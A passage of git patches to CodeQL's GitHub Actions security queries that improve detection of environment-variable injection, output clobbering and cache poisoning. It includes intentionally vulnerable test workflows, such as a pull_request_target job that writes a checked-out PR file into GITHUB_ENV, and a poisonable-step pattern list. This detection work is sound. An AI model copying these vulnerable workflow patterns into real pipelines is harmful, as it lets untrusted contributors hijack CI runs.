content) { extractFileWrite(run.getScript(), "GITHUB_PATH", content) } +/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ +bindingset[script, file_var] +predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) +} + +predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) +} + +predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) +} + +predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) +} + predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index fc45b8c041d0..40c0c7da9eb9 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -16,27 +17,39 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubPath(run, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_PATH + fileToGitHubPath(run, _) + or + exists(string value | + writeToGitHubPath(run, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f7a9283f8002..4f54f38f2746 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -12,33 +13,48 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.env >> $GITHUB_ENV * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_ENV + fileToGitHubEnv(run, _) + or + exists(string content, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + // e.g. + // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4fe3268c00af..af8f7af089db 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -12,40 +13,53 @@ abstract class OutputClobberingSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT * echo "sha=$(> $GITHUB_OUTPUT */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and - not key2 = key - ) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.vars >> $GITHUB_OUTPUT + fileToGitHubOutput(run, _) + or + exists(string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 000000000000..f43a12cb42a3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -0,0 +1,28 @@ +name: Build and Dockerize + +on: + pull_request_target: + +jobs: + build: + name: Test + runs-on: ubuntu-latest + steps: + - name: Decide Which 'ref' To Checkout + id: decide-ref + run: | + if [[ "${{github.event_name}}" == "pull_request_target" ]]; then + echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT + else + echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT + fi + + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{steps.decide-ref.outputs.ref}} + path: "foo" + + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 7d92032f00b7..359275aef43d 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,6 +59,8 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -80,3 +83,4 @@ subpaths | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 2cd369538027..eaa9fed4c617 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,5 +59,7 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select From 0990774302bc2556973584bb4c4d41043f0d7b78 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 18:53:53 +0200 Subject: [PATCH 449/707] feat(poisonable_steps): Add python -m pip install --- ql/lib/ext/config/poisonable_steps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e2742fd60a7c..f79ca795cd09 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -44,6 +44,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] + - ["python\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] From 397eb2a762ae15ff89237c7b8db0f8443ef9fdb1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:20 +0200 Subject: [PATCH 450/707] Add getPath() to PRHeadCheckout and CacheWriting classes Add getPath() methods to get the path where a checkout step writes the code and where a Cache write reads the files from. --- .../actions/security/CachePoisoningQuery.qll | 34 ++++++++++++++++++- .../security/UntrustedCheckoutQuery.qll | 30 +++++++++++++++- 2 files changed, 62 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 29c0ed4feed0..8c1a9ee0fd78 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -44,14 +44,28 @@ predicate runsOnDefaultBranch(Event e) { ) } -abstract class CacheWritingStep extends Step { } +abstract class CacheWritingStep extends Step { + abstract string getPath(); +} class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class SetupJavaUsesStep extends CacheWritingStep, UsesStep { @@ -62,6 +76,9 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupGoUsesStep extends CacheWritingStep, UsesStep { @@ -73,6 +90,9 @@ class SetupGoUsesStep extends CacheWritingStep, UsesStep { this.getArgument("cache") = "true" ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -83,6 +103,9 @@ class SetupNodeUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupPythonUsesStep extends CacheWritingStep, UsesStep { @@ -93,6 +116,9 @@ class SetupPythonUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { @@ -103,6 +129,9 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -110,4 +139,7 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and this.getArgument("bundler-cache") = "true" } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fba33bb8bc87..7cfda4da49cb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,6 +1,12 @@ import actions import codeql.actions.DataFlow +string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -68,7 +74,9 @@ predicate containsHeadRef(string s) { } /** Checkout of a Pull Request HEAD */ -abstract class PRHeadCheckoutStep extends Step { } +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} /** Checkout of a Pull Request HEAD ref */ abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } @@ -138,6 +146,12 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ @@ -194,6 +208,12 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -216,6 +236,8 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -235,6 +257,8 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -256,6 +280,8 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -274,4 +300,6 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } From c5314aeb6c1e7497733f539c783ce5d7ec083bc9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:27 +0200 Subject: [PATCH 451/707] Add new tests --- .../CWE-349/.github/workflows/test22.yml | 35 +++++++++++++++++++ .../CWE-349/.github/workflows/test23.yml | 35 +++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml new file mode 100644 index 000000000000..f8e1dabf565c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml new file mode 100644 index 000000000000..3f35068eb7dc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ./results/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore From 34b48d559b17536e9274f0bcf9e462ab5a8aeb57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:45:51 +0200 Subject: [PATCH 452/707] Add expected tests results --- .../Security/CWE-349/CachePoisoning.expected | 52 +++++++++++-------- 1 file changed, 30 insertions(+), 22 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 